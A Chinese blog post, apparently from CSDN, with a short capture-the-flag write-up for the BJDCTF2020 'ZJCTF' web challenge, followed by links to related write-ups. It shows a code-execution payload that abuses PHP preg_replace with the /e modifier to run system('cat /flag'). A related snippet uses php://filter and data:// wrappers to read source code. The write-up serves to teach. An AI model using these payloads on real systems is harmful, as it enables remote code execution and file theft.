[BJDCTF2020]ZJCTF,不过如此(读取文件、preg_replace与代码执行)

最新推荐文章于 2022-05-07 19:54:13 发布
最新推荐文章于 2022-05-07 19:54:13 发布
阅读量143 收藏
点赞数
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44111753/article/details/113664010
版权

知识点

题解
先读取next.php的源码(与上题方法一样)

  preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);

\\1其实就是\1,\1表示取出正则匹配后的第一个括号内的字符(\2也就是取出第二项)
在这里插入图片描述
接下来就要想办法调用getFlag()并传入cmd参数
构造payload

next.php?\S*=${getFlag()}&cmd=system('cat /flag');

1、用$包裹,是为了${val}的val能够当成变量执行
2、使用的模式是\S而不是.是因为在PHP中,对于传入的非法的 $_GET 数组参数名,会将其转换成下划线

行于其野
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF2020]ZJCTF不过如此
夜幕下的灯火阑珊的博客
05-14 1960
知识点 php://input filter伪协议 preg_replace() /e模式命令执行题目源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I...
buuctf-misc题目练习三
最新发布
2401_82760239的博客
05-10 351
大多数现代路由器允许备份到一个文件路由器的配置,然后从文件中恢复配置时的需要。路由器的备份文件通常包含了像ISP的用户名重要数据/密码,路由器的登录密码,无线网络的关键。看一下里面有没有什么其他的文件之类的,发现里面包含一个flag.txt的文件,用formost分离后得到flag。根据题目提示将账号和密码拼接在一起为adminaadminb,然后找一个工具将他的md5哈希值算一下。追踪tcp,发现里面有一个压缩包,用formost分离之后发现需要密码,四位数字掩码爆破即可得到flag。
ZJCTF不过如此
evil_ming的博客
05-07 75
打开靶机 看见if知道条件要求写text函数包含i have a dream。 一整个疑惑住,返回重看一下发现漏了个点,重新补上要求包含的next.php。 index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php base64解码 next.php?\S%2b=${getFlag()}&cmd=system(
eregi_replace与preg_replace 函数代码的用法比较
10-30
在本文中,我们将深入探讨`eregi_replace`与`preg_replace`这两个PHP函数,并通过具体的示例来解析它们之间的差异以及如何正确使用这些函数。同时,我们也会详细解释所提供的示例代码中的各种符号及其含义。 ### 一...
深入研究PHP中的preg_replace代码执行
10-18
主要给大家介绍了关于PHP中preg_replace代码执行的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
PHP正则替换函数preg_replace和preg_replace_callback使用总结
12-18
`preg_replace_callback()` 函数与 `preg_replace()` 类似,但更加灵活和安全。它允许将匹配的部分传递给一个回调函数处理,而不是简单地替换为固定的字符串。 **基本语法:** ```php mixed preg_replace_callback...
自定义ubb代码,preg_replace()函数的一些代码
10-30
【自定义UBB代码与preg_replace()函数应用详解】 在Web开发中,有时我们需要处理用户输入的文本,使其能够以特定格式显示,如论坛或博客中的富文本编辑。UBB(User Bulletin Board)代码是一种简单的标记语言,用于...
[BUUCTF][BJDCTF2020]ZJCTF不过如此
cosmoslin的博客
01-24 750
考点 代码审计 命令执行 解题 打开环境 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此
weixin_44622228的博客
04-20 1944
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此 分析代码,ge传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪...
[BJDCTF2020]ZJCTF不过如此(preg_replace /e 模式下的代码漏洞问题)
xlcvv的博客
04-30 607
题目给了源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_ge...
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2694
进去就是一串PHP代码代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace
qq_43622442的博客
05-09 1839
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace) 1.打开网站,审计,第一个if可以用php://input 或者 data://伪协议绕过,php伪协议分析可看php伪协议: 2.然后往下,提示next.php文件,这里可以用php://filter伪协议拿到它的源码: 3.payload: http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&f
preg_replace_all
06-06
可能是您误解了 `preg_replace` 函数的作用。`preg_replace` 函数会在字符串中使用正则表达式进行替换,并返回替换后的字符串。如果要替换所有匹配项,可以使用 `preg_replace` 函数的第四个参数 `$count`,将其设置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值